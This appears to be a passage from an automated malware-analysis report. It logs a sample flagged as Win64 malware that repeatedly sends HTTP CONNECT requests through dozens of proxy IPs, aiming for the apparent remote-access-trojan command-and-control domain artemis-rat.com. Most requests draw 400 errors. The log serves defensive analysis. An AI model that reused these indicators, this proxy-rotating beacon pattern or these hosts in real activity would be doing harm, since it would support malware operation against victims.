                                              Mar 11, 2024 08:37:25.757361889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.367989063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.569633007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.070221901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              211192.168.2.450693185.162.228.170807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.933237076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.087359905 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              212192.168.2.45066166.228.35.209174647284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.934997082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.459937096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.131849051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.459968090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163521051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866578102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.554241896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.866430044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.569356918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              213192.168.2.450469103.200.135.22941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.935743093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              214192.168.2.450459103.120.6.46807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.938875914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.318451881 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              215192.168.2.450712104.22.1.113807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.942260027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.096304893 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              216192.168.2.450713104.24.15.158807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.942718029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.097071886 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              217192.168.2.450582147.75.92.244100017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.945069075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.221049070 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              218192.168.2.450735172.67.181.129807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.985507011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.140424967 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              219192.168.2.45064172.210.252.13741457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.011199951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              220192.168.2.449812173.249.33.12238807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.011518955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.091846943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.183547020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366682053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.366516113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:54.381923914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:06.522500038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:30.522476912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              221192.168.2.45056275.119.145.169615537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.011898041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.678683043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.616226912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.553939104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.366462946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              222192.168.2.450755172.67.254.127807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.011909008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.166228056 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              223192.168.2.450446203.112.134.7456787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.012492895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              224192.168.2.450778104.25.42.178807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.012516975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.166927099 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              225192.168.2.45070251.75.126.150365807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.012882948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              226192.168.2.450783188.114.99.37807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.012927055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.167304039 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              227192.168.2.45054031.43.158.10888887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.013170958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              228192.168.2.449846177.234.194.2269997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.013500929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.328269005 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              229192.168.2.450065192.111.138.2941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.013528109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              230192.168.2.45057981.250.223.126807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.013721943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.265580893 CET536INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Content-Length: 613
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
